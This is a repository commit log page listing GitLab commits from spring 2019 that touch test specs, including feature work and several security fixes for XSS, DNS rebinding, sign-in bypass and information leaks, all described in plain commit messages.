summaryrefslogtreecommitdiff
path: root/spec
Commit message (Collapse)AuthorAgeFilesLines
* Introduce sidekiq worker for auto merge processintroduce-auto-merge-process-workerShinya Maeda2019-06-043-27/+65
| | | | | As we have a central domain for auto merge process today, we should use a single worker for any auto merge process.
* Merge branch 'sh-fix-import-url-update' into 'master'Thong Kuah2019-06-031-0/+12
|\ | | | | | | | | | | | | Fix project settings not being able to update Closes #62708 See merge request gitlab-org/gitlab-ce!29097
| * Fix project settings not being able to updateStan Hu2019-06-031-0/+12
| | | | | | | | | | | | | | | | Previously import_url would always be present in the update parameters, which would cause the validation to fail. We now only include this parameter only if there is URL given. Closes https://gitlab.com/gitlab-org/gitlab-ce/issues/62708
* | Comply with `no-implicit-coercion` rule (CE)Nathan Friend2019-06-033-3/+7
| | | | | | | | | | | | | | | | This commit is the result of running `yarn eslint --fix` after enabling the `no-implicit-coercion` ESLint rule. This rule has been added to our ESLint config here: https://gitlab.com/gitlab-org/gitlab-eslint-config/merge_requests/14
* | Backporting EE fixrossfuhrman2019-06-031-36/+38
|/
* Move boardsStore.moving to BoardList componentWinnie Hellmann2019-06-031-0/+12
|
* Merge branch 'master' of dev.gitlab.org:gitlab/gitlabhqRobert Speicher2019-06-035-2/+72
|\
| * Merge branch 'security-60143-address-xss-issue-master' into 'master'Robert Speicher2019-06-031-0/+42
| |\ | | | | | | | | | | | | Reject slug+uri concat if slug is deemed unsafe See merge request gitlab/gitlabhq!3108
| | * Reject slug+uri concat if slug is deemed unsafeKerri Miller2019-05-241-0/+42
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | First reported: https://gitlab.com/gitlab-org/gitlab-ce/issues/60143 When the page slug is "javascript:" and we attempt to link to a relative path (using `.` or `..`) the code will concatenate the slug and the uri. This MR adds a guard to that concat step that will return `nil` if the incoming slug matches against any of the "unsafe" slug regexes; currently this is only for the slug "javascript:" but can be extended if needed. Manually tested against a non-exhaustive list from OWASP of common javascript XSS exploits that have to to with mangling the "javascript:" method, and all are caught by this change or by existing code that ingests the user-specified slug.
| * | Merge branch 'security-58856-persistent-xss-in-note-objects' into 'master'Robert Speicher2019-06-034-2/+30
| |\ \ | | | | | | | | | | | | | | | | Persistent XSS in note objects CE See merge request gitlab/gitlabhq!3075
| | * | Remove unused fixture linesTiger2019-05-281-2/+0
| | | |
| | * | Add `html` to sensitive wordscharlieablett2019-05-012-2/+3
| | | |
| | * | Remove accidental regressionscharlieablett2019-04-301-5/+6
| | | |
| | * | Ensure Issue & MR note_html cannot be importedAsh McKenzie2019-04-302-16/+16
| | | |
| | * | Add disallowed fields to AttributeCleanercharlieablett2019-04-242-10/+8
| | | |
| | * | Re-stub stubbed method callscharlieablett2019-04-231-3/+9
| | | |
| | * | Exclude fields from note importcharlieablett2019-04-232-2/+26
| | | |
* | | | Merge branch 'osw-sync-merge-ref-upon-mergeability-check' into 'master'Douwe Maan2019-06-035-141/+251
|\ \ \ \ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Automatically update MR merge-ref along merge status Closes #58495 See merge request gitlab-org/gitlab-ce!28513
| * | | | Add payload to the service responseOswaldo Ferreira2019-05-312-0/+111
| | | | | | | | | | | | | | | | | | | | | | | | | This introduces payload to the ServiceResponse with the merge ref HEAD commit data
| * | | | Automatically update MR merge-ref along merge statusOswaldo Ferreira2019-05-314-141/+140
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This couples the code that transitions the `MergeRequest#merge_status` and refs/merge-requests/:iid/merge ref update. In general, instead of directly telling `MergeToRefService` to update the merge ref, we should rely on `MergeabilityCheckService` to keep both the merge status and merge ref synced. Now, if the merge_status is `can_be_merged` it means the merge-ref is also updated to the latest. We've also updated the logic to be more systematic and less user-based.
* | | | | Merge branch '58269-separate-update-patch' into 'master'Mike Greiling2019-06-033-60/+180
|\ \ \ \ \ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Do not display Update app button when saving Knative domain name Closes #58269 See merge request gitlab-org/gitlab-ce!28904
| * | | | | Add updateSuccessful/Failed props to knative appEnrique Alcantara2019-05-301-0/+2
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | They are used to indicate when knative domain name has changed
| * | | | | Extract knative domain editor into a componentEnrique Alcantara2019-05-302-60/+178
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | The new component also implements several improvements in the knative domain editor workflow: - Display a loading spinner when saving changes in the domain name - Display success toast message indicating changes were saved successfully. - Display error message in the contraty occurs
* | | | | | Cleans up UpdateProjectStatistics concernMayra Cabrera2019-06-032-10/+11
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | - Renames attributes from stat to project_statistiscs_name and attribute to statistic_attribute - Reordes methods on UpdateProjectStatistics concern - Removes unused module from Ci::Build
* | | | | | Merge branch 'issafeurl-utility' into 'master'Kushal Pandya2019-06-031-0/+84
|\ \ \ \ \ \ | | | | | | | | | | | | | | | | | | | | | | | | | | | | Add global isSafeURL utility See merge request gitlab-org/gitlab-ce!28943
| * | | | | | Add global isSafeURL utilityissafeurl-utilityPaul Gascou-Vaillancourt2019-06-031-0/+84
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | - Added isSafeURL utility based on prior work in gitlab-ee - Also added isAbsoluteOrRootRelative() and getBaseURL() utils, needed by isSafeURL - Removed URL() fallback because URL() is now polyfilled - Updated specs
* | | | | | | Move NoteApp tests to JestWinnie Hellmann2019-06-032-106/+103
| | | | | | |
* | | | | | | Merge dev.gitlab.org master into GitLab.com masterYorick Peterse2019-06-0341-128/+883
|\ \ \ \ \ \ \ | | |_|_|/ / / | |/| | | | |
| * | | | | | Merge branch 'security-jej/prevent-web-sign-in-bypass' into 'master'GitLab Release Tools Bot2019-06-031-1/+33
| |\ \ \ \ \ \ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Prevent password sign in restriction bypass See merge request gitlab/gitlabhq!2702
| | * | | | | | Prevent password sign in restriction bypassJames Edwards-Jones2019-05-211-1/+33
| | | | | | | |
| * | | | | | | Merge branch 'security-fix_milestones_search_api_leak' into 'master'GitLab Release Tools Bot2019-06-033-4/+83
| |\ \ \ \ \ \ \ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Resolve: Milestones leaked via search API Closes #2822 See merge request gitlab/gitlabhq!2997
| | * | | | | | | Resolve: Milestones leaked via search APIFelipe Artur2019-05-203-4/+83
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Fix milestone titles being leaked using search API when users cannot read milestones
| * | | | | | | | Merge branch 'security-60039' into 'master'GitLab Release Tools Bot2019-06-035-31/+106
| |\ \ \ \ \ \ \ \ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Disallow invalid MR branch name See merge request gitlab/gitlabhq!3052
| | * | | | | | | | Refactor spec to not use truthy or falseyMark Chao2019-05-031-58/+58
| | | | | | | | | |
| | * | | | | | | | Use full ref when creating MR pipeline in specsMark Chao2019-05-031-3/+3
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Continuation of 426488b7218e85ce69868ae4628801af2322b74a
| | * | | | | | | | Validate MR branch namesMark Chao2019-05-034-28/+103
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Prevents refspec as branch name, which would bypass branch protection when used in conjunction with rebase. HEAD seems to be a special case with lots of occurrence, so it is considered valid for now. Another special case is `refs/head/*`, which can be imported.
| * | | | | | | | | Merge branch 'security-id-leaked-password-in-import-url-frontend' into 'master'GitLab Release Tools Bot2019-06-034-2/+105
| |\ \ \ \ \ \ \ \ \ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Handling password on import by url page See merge request gitlab/gitlabhq!3061
| | * | | | | | | | | Handling password on import by url pageSam Bigelow2019-05-291-2/+12
| | | | | | | | | | |
| | * | | | | | | | | Hide password on import by url formIgor Drozdov2019-05-293-0/+93
| | | | | | | | | | |
| * | | | | | | | | | Merge branch 'dm-http-hostname-override' into 'master'GitLab Release Tools Bot2019-06-0325-66/+405
| |\ \ \ \ \ \ \ \ \ \ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Protect Gitlab::HTTP against DNS rebinding attack See merge request gitlab/gitlabhq!3071
| | * | | | | | | | | | Add DNS rebinding protection settingsOswaldo Ferreira2019-05-304-1/+101
| | | | | | | | | | | |
| | * | | | | | | | | | Protect Gitlab::HTTP against DNS rebinding attackDouwe Maan2019-05-3023-65/+304
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Gitlab::HTTP now resolves the hostname only once, verifies the IP is not blocked, and then uses the same IP to perform the actual request, while passing the original hostname in the `Host` header and SSL SNI field.
| * | | | | | | | | | | Merge branch 'security-fix-project-existence-disclosure-master' into 'master'GitLab Release Tools Bot2019-06-031-14/+18
| |\ \ \ \ \ \ \ \ \ \ \ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Fix url redaction for issue links See merge request gitlab/gitlabhq!3091
| | * | | | | | | | | | | Fix url redaction for issue linksPatrick Derichs2019-05-031-14/+18
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Add changelog entry Add missing href to all redactor specs and removed href assignment Remove obsolete spec If original_content is given, it should be used for link content
| * | | | | | | | | | | | Merge branch 'security-unsubscribing-from-issue' into 'master'GitLab Release Tools Bot2019-06-031-10/+99
| |\ \ \ \ \ \ \ \ \ \ \ \ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Hide issue title on unsubscribe for anonymous users See merge request gitlab/gitlabhq!3097
| | * | | | | | | | | | | | Hide issue title on unsubscribe for anonymous usersAlexandru Croitor2019-05-161-10/+99
| | | | | | | | | | | | | |
| * | | | | | | | | | | | | Merge branch 'security-fix-confidential-issue-label-visibility-master' into ↵GitLab Release Tools Bot2019-06-031-0/+34
| |\ \ \ \ \ \ \ \ \ \ \ \ \ | | |_|_|/ / / / / / / / / / | |/| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | 'master' Fix confidential issue label disclosure on milestone view See merge request gitlab/gitlabhq!3098
| | * | | | | | | | | | | | Fix confidential issue label disclosure on milestone viewPatrick Derichs2019-05-141-0/+34
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Add changelog entry Method should be public Use milestonish method Use render data to filter labels Add specs for label visibility on milestone
* | | | | | | | | | | | | | Merge branch 'ac-graphql-stats' into 'master'Dmitriy Zaporozhets2019-06-0310-5/+256
|\ \ \ \ \ \ \ \ \ \ \ \ \ \ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Add Namespace and ProjectStatistics to GraphQL API See merge request gitlab-org/gitlab-ce!28277
| * | | | | | | | | | | | | | Add Namespace and ProjectStatistics to GraphQL APIAlessio Caiazza2019-06-0310-5/+256
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | We can query namespaces, and nested projects. Projects now exposes statistics
View Lorry Controller Status